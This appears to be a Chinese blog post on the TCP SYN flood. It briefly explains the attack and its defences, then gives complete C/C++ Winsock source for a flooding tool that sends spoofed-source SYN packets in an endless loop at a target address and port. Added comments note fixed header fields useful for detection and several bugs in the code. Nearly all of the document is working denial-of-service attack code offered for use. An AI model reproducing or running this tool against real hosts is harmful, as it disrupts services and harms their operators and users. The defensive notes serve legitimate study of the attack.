SynFlood---Ddos洪泛攻击(VC6.0)


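熟悉 TCP 的都知道,connect 时有三次握手过程,也就是所谓的 [SYN]、[SYN+ACK]、[ACK]。目的主机收到 SYN 后,会回复一个 [SYN+ACK] 确认包,并为这个半开连接保留资源,等待对方的 [ACK];但若报文中的源 IP 是伪造的、并不存在,三次握手中最后的 [ACK] 包就不会返回,半开连接要等到超时才会被释放,导致目标主机不断为到来的连接分配资源。这样,只要源主机不断发送 SYN 报文,伪造大量的 IP 地址,目的主机的半开连接队列就会被占满,最终将会由于资源耗尽而无法接受正常连接甚至崩溃。常见的防护手段是在服务器上启用 SYN Cookie、缩短半开连接的超时时间,并在网络边界做源地址校验(入口过滤,BCP 38),让伪造源地址的报文无法发出。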

/************************************************************************//*synFlood.h*//*2013-3-18*//************************************************************************/typedef unsigned short ushort;typedef unsigned long ulong;typedef unsigned int uint;typedef unsigned char uchar;//ip首部typedef struct ip_hdr {uchar h_verlen; //4位首部长度,4位IP版本号uchar tos; //8位服务类型TOSushort total_len; //16位总长度(字节)ushort ident; //16位标识ushort frag_and_flags; //3位标志位(另外13位为片偏移)uchar ttl; //8位生存时间 TTLuchar protocols; //8位协议 (如ICMP,TCP等)ushort chksum; //16位IP首部校验和uint sourceIP; //32位源IP地址uint destIP; //32位目的IP地址}IP_HDR;//tcp首部typedef struct tcp_hdr{ushort sourcePort;//16位源端口号ushort destPort;//16位目的端口号uint seq;//32位序号uint ack;//32位确认序号uchar h_lenres;//4位首部长度,6位保留uchar flag;//6位标识ushort win;//16位窗口大小ushort chksum;//16位校验和ushort urgpoint;//16位紧急指针}TCP_HDR;//tcp伪首部,用于校验和的计算typedef struct pre_tcp_hdr{ulong sourceAddr; //32位源地址ulong destAddr; //32位目的地址char mbz;uchar ptcl; //8位协议类型ushort tcplen; //16位TCP长度}PRE_HDR;

/************************************************************************/
/*synFlood.cpp*/
/*2013-03-18                                                          */
/************************************************************************/
// Sample SYN flood sender for Winsock. Each loop iteration in main() builds
// an IPv4 header with a fabricated source address and a TCP header whose
// flag byte is 2 (SYN), then hands both to a raw socket opened with
// IP_HDRINCL.
//
// Reading notes for defenders, all taken from the constants in dataFill():
//   - the sequence number (0x12345678), window (512), IP identification
//     field and TCP header length (5 words, i.e. no options) are the same
//     in every packet; only source address, source port and TTL vary;
//   - TTL falls in 123..209 and the source port in 0..9897;
//   - NOTE(review): a SYN without any TCP options is unusual for ordinary
//     client stacks, so these fixed fields make practical match criteria
//     for a detection rule - confirm against real captures.
#include <stdio.h>
#include <winsock2.h>
#include <time.h>
#include <windows.h>
#include <string.h>
#include <WS2TCPIP.H>
#include "synFlood.h"

#define SLEEPTIME 10            // argument to Sleep() after each successful send

SOCKET sock;                    // raw socket created in main()
SOCKADDR_IN addr_in;            // destination address handed to sendto()
IP_HDR ipHdr;                   // headers rebuilt by dataFill() on every iteration
TCP_HDR tcpHdr;
PRE_HDR preHdr;
int SourcePort;
char sendBuf[60]={0};           // scratch area for checksum input, then the outgoing packet
int rect;                       // last sendto() return value
#pragma comment(lib, "ws2_32.lib")

// Checksum helper: sums the buffer as 16-bit words, adds a trailing odd
// byte if there is one, folds the carries back into the low 16 bits and
// returns the one's complement of the result.
//   buffer - start of the data to sum
//   size   - length of the data in bytes
ushort chkSum(ushort *buffer, int size)
{
    ulong cksum=0;
    while(size >1)
    {
        cksum+=*buffer++;
        size -=sizeof(ushort);
    }
    // one byte left over when size was odd
    if(size)
    {
        cksum += *(uchar*)buffer;
    }
    // fold the carry bits twice so the sum fits in 16 bits
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >>16);
    return (ushort)(~cksum);
}

// Fills the global ipHdr, tcpHdr and preHdr for one packet.
//   argv[1] - destination IPv4 address string, converted with inet_addr()
//   argv[2] - destination port string, converted with atoi()
// Neither conversion result is checked. Always returns true.
int dataFill(char * argv[])
{
    // Reseeds rand() on every call; rand() is not called anywhere in this
    // file, so the varying fields below come from GetTickCount() instead.
    srand((int)time(0));
    // fill the IP header
    ipHdr.h_verlen=(4<<4 | sizeof(ipHdr)/sizeof(ulong));
    ipHdr.tos=0;
    // IP total length. sizeof(ipHdr) is added twice; the value is written
    // exactly as the author has it.
    ipHdr.total_len=htons(sizeof(ipHdr)+sizeof(ipHdr));
    ipHdr.ident=1;                  // constant, stored without htons()
    ipHdr.frag_and_flags=0; // no fragmentation
    // the cast applies to GetTickCount() before the %, so the result is 123..209
    ipHdr.ttl=(uchar)GetTickCount()%87+123;;
    ipHdr.protocols=IPPROTO_TCP; // protocol is TCP
    ipHdr.chksum=0; // checksum field starts at 0; nothing in this file recomputes it
    ipHdr.sourceIP=htonl(GetTickCount()*474695); // fabricated source IP derived from the tick count
    ipHdr.destIP=inet_addr(argv[1]); // destination IP
    //printf("%d\n\n",ipHdr.destIP);
    // fill the TCP header
    SourcePort=GetTickCount()*43557%9898; // source port derived from the tick count, 0..9897
    //printf("%d\n\n",SourcePort);
    tcpHdr.destPort=htons(atoi(argv[2])); // destination port
    tcpHdr.sourcePort=htons(SourcePort); // source port
    tcpHdr.seq=htonl(0x12345678);   // same sequence number in every packet
    tcpHdr.ack=0;
    tcpHdr.h_lenres=(sizeof(tcpHdr)/4<<4|0);    // header length in 32-bit words, high nibble
    tcpHdr.flag=2; // SYN request
    tcpHdr.win=htons(512);// window size
    tcpHdr.urgpoint=0;
    tcpHdr.chksum=0;                // must be 0 while the checksum is being computed in main()
    // fill the TCP pseudo-header used to compute the TCP checksum
    preHdr.sourceAddr=ipHdr.sourceIP;
    preHdr.destAddr=ipHdr.destIP;
    preHdr.mbz=0;
    preHdr.ptcl=IPPROTO_TCP;
    preHdr.tcplen=htons(sizeof(tcpHdr));// TCP length
    return true;
}

// Sends the first sizeof(ipHdr)+sizeof(tcpHdr) bytes of sendBuf to addr_in.
// Returns false right after printing the Winsock error code when sendto()
// fails; otherwise prints a success line, sleeps SLEEPTIME and returns true.
int sendData()
{
    rect=sendto(sock, sendBuf, sizeof(ipHdr)+sizeof(tcpHdr), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
    if (rect==SOCKET_ERROR)
    {
        printf("send error!:%x",WSAGetLastError());
        return false;
    }
    else
        printf("success send\n");
    Sleep(SLEEPTIME);
    return true;
}

// Usage as read from the checks below: argv[1] is the destination IPv4
// address and argv[2] the destination port; a fourth argument is accepted
// by the argc test but never read.
// Every error path uses "return false", which converts to exit status 0, so
// a failed start cannot be told apart from success by the exit code.
int main(int argc,char *argv[])
{
    WORD wVersionRequested;
    WSADATA wsaData;
    int err;
    BOOL flag;
    // Winsock version check
    wVersionRequested = MAKEWORD( 2, 2 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
        printf("WSAStartup Error!");
        return false;
    }
    if ( LOBYTE( wsaData.wVersion ) != 2 ||
         HIBYTE( wsaData.wVersion ) != 2 ) {
        printf("Could not find a usable WinSock DLL\n");
        WSACleanup( );
        return false;
    }
    // argument check (this and the later error returns skip WSACleanup)
    if (argc < 3 || argc >4 )
    {
        printf("input error!\n");
        return false;
    }
    // Creating a raw socket requires administrator privileges.
    // NOTE(review): desktop Windows releases since XP SP2 are documented as
    // refusing TCP data on raw sockets, so the sendto() in sendData() is
    // expected to fail on them - confirm against the platform documentation.
    if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
    {
        printf("Socket Error!\n");
        return false;
    }
    // IP_HDRINCL: the caller supplies the IP header itself
    flag=true;
    if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
    {
        printf("setsockopt IP_HDRINCL error!\n");
        return false;
    }
    int nSendTime=30*1000;// send timeout handed to SO_SNDTIMEO
    if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nSendTime, sizeof(nSendTime))==SOCKET_ERROR)
    {
        printf("setsockopt SO_SNDTIMEO error!\n");
        return false;
    }
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(atoi(argv[2]));// destination port
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);// destination IP
    // No exit condition; the return values of dataFill() and sendData()
    // are ignored.
    while(1)
    {
        dataFill(argv);
        // compute the checksum over the pseudo-header followed by the TCP
        // header, using sendBuf as scratch space
        memcpy(sendBuf, &preHdr, sizeof(preHdr));
        memcpy(sendBuf+sizeof(preHdr), &tcpHdr, sizeof(tcpHdr));
        tcpHdr.chksum=chkSum((ushort *)sendBuf,sizeof(preHdr)+sizeof(tcpHdr));
        // overwrite sendBuf with the fabricated IP header followed by the
        // TCP header (now carrying its checksum) and send it
        memcpy(sendBuf, &ipHdr, sizeof(ipHdr));
        memcpy(sendBuf+sizeof(ipHdr), &tcpHdr, sizeof(tcpHdr));
        sendData();
    }
    // not reached: the loop above never breaks
    closesocket(sock);
    WSACleanup();
    return 0;
}

